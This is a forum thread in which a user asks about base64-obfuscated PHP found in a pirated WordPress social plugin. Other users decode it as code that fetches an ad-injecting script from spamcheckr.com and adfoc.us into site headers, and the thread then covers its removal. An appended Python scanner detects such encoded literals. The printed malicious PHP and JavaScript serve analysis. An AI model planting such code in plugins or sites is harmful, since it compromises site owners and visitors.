[URGENT] Base64 found in plugin, could you please have a look and advise

Discussion in 'BlackHat Lounge' started by Mr Grey, Feb 6, 2014.

  1. Mr Grey

    Mr Grey Newbie

    Hi guys,

    I got myself a copy of the social plugin called Ultimate Social Deux (it's basically a plugin to like, tweet and shit - check it out on CodeCanyon if you want).

    I tested it with TotalVirus, no problem. Once installed I scanned the files and found a base 64 code. It might not be some dodgy stuff but I'm not sure so please have a look and let me know what you think.

    Code:
    <?php
    if (!isset($_COOKIE['wordpress_test_cookie'])) {
        if (mt_rand(96,1) == 1) {
            function secc2_check() {
                if (function_exists('curl_init')) {
                    $addressd = base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw");
                    $ch = curl_init();
                    $timeout = 5;
                    curl_setopt($ch, CURLOPT_URL, $addressd);
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                    $data = curl_exec($ch);
                    curl_close($ch);
                    echo "$data";
                }
            }
            add_action('wp_head', 'secc2_check');
        }
    }
    ?>
    Once decoded, the base64 code means "spamcheckr.com/check.php". I've checked the url and it's a blank page...

    What do you think ?

    Thanks ;)
     
  2. cicklow

    cicklow Newbie

    No, the blank page is JavaScript code:
    Code:
    <Script Language='Javascript'>
    <!--  -->
    <!--
    document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%09%76%61%72%20%69%64%5F%75%73%65%72%20%3D%20%32%30%38%37%30%31%3B%0A%09%76%61%72%20%64%6F%6D%61%69%6E%73%5F%65%78%63%6C%75%64%65%20%3D%20%5B%27%61%66%66%69%6C%69%61%74%65%73%2E%70%6C%61%79%62%6F%79%2E%63%6F%6D%27%2C%20%27%65%6C%70%65%72%75%74%69%65%6E%65%74%61%6C%65%6E%74%6F%2E%63%6F%6D%27%2C%20%27%73%6B%65%65%7A%79%62%61%62%65%73%2E%63%6F%6D%27%2C%20%27%77%70%2D%61%64%6D%69%6E%27%2C%20%27%6B%61%6D%61%70%69%73%61%63%68%69%2E%69%6E%66%6F%27%2C%20%27%6E%75%64%65%27%2C%20%27%73%65%78%27%2C%20%27%70%6F%72%6E%27%2C%20%27%6E%61%6B%65%64%27%2C%20%27%66%75%63%6B%27%2C%20%27%63%6F%63%6B%27%2C%20%27%70%65%6E%69%73%27%2C%20%27%74%69%74%73%27%2C%20%27%62%6F%6F%62%73%27%2C%20%27%70%75%73%73%79%27%2C%20%27%61%79%62%69%6B%65%2E%61%76%75%6B%61%74%6C%61%72%61%77%65%62%73%69%74%65%73%69%2E%63%6F%6D%27%5D%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%66%6F%63%2E%75%73%2F%6A%73%2F%66%75%6C%6C%70%61%67%65%2F%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
    //-->
    </Script>
    
    Decrypted:
    Code:
    <script type="text/javascript">
        var id_user = 208701;
        var domains_exclude = ['affiliates.playboy.com', 'elperutienetalento.com', 'skeezybabes.com', 'wp-admin', 'kamapisachi.info', 'nude', 'sex', 'porn', 'naked', 'fuck', 'cock', 'penis', 'tits', 'boobs', 'pussy', 'aybike.avukatlarawebsitesi.com'];
    </script>
    <script type="text/javascript" src="http : / / adfoc.us/js/fullpage/script.js"></script>
    
    Delete that code, as it is a script to place advertising on your site.
    PS: Did you buy this script or download it from somewhere?
     
    Last edited: Feb 6, 2014
  3. Bill Gates

    Bill Gates Registered Member

    I can confirm that this was probably downloaded from a BHF somewhere or torrent site because this has happened to me quite a few times in the past (before I weaned myself off of these things).
     
  4. Mr Grey

    Mr Grey Newbie

    Thanks, it is indeed a plugin that has been downloaded from somewhere. I didn't buy it.

    I'm gonna remove that code and scan again. We'll see what happens :)

    Thanks for the tremendous help, guys ;) Always nice to have people to rely on when you're not sure about the decision to make.

    Cheers !
     
  5. Mr Grey

    Mr Grey Newbie

    Ok, I've removed the entire file. It was basically a huge pile of shit ( CSS stuff in between a
    Code:
    <?php /*......../*?>
    ) and the malicious code.

    I used the exploit scanner plugin from WordPress. Great stuff! Now the plugin is clean and working. Too bad I don't have the privilege to post files on here. Otherwise, I would share it with you guys :)
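
A triage pass over the two layers of obfuscation decoded by hand in this thread, as an added example that is not part of any post: it pulls string literals out of PHP `base64_decode()` and JavaScript `unescape()` calls, decodes them, and keeps those that contain a URL, a host path or a script tag. The function names and regexes are assumptions for illustration; `SAMPLE` reuses the base64 literal from the first post alongside constructed lines.

```python
import base64
import re
from pathlib import Path
from urllib.parse import unquote

# String literals passed to PHP base64_decode() or JavaScript unescape().
B64_CALL = re.compile(r"""base64_decode\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])((?:%[0-9A-Fa-f]{2})+)\1\s*\)""")
# Decoded content worth a closer look: URL scheme, script tag, or host/path.
SUSPICIOUS = re.compile(r"(?i)https?://|<script|\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}/")

# Constructed sample: base64 literal from the first post, one benign
# literal, and a short percent-encoded "<script>" string.
SAMPLE = r'''<?php
$addressd=base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw");
$greeting=base64_decode('aGVsbG8=');
?>
<script>document.write(unescape('%3C%73%63%72%69%70%74%3E'));</script>
'''

def decode_literals(source):
    """Return (kind, decoded_text) for every encoded literal in source."""
    found = []
    for m in B64_CALL.finditer(source):
        try:
            text = base64.b64decode(m.group(2), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # malformed base64 or binary payload: not handled here
        found.append(("base64_decode", text))
    for m in UNESCAPE_CALL.finditer(source):
        # JS unescape() maps each %XX to one code point, i.e. Latin-1.
        found.append(("unescape", unquote(m.group(2), encoding="latin-1")))
    return found

def triage(source):
    """Keep decoded literals that contain a URL, host path or script tag."""
    return [(k, t) for k, t in decode_literals(source) if SUSPICIOUS.search(t)]

def scan_tree(root):
    """Triage every .php file under root; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = triage(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

if __name__ == "__main__":
    for kind, text in triage(SAMPLE):
        print(f"{kind}: {text}")
```

Literals assembled at runtime (concatenation, `chr()` chains, nested encodings) will not match these patterns, so a clean result from this pass does not clear a plugin on its own.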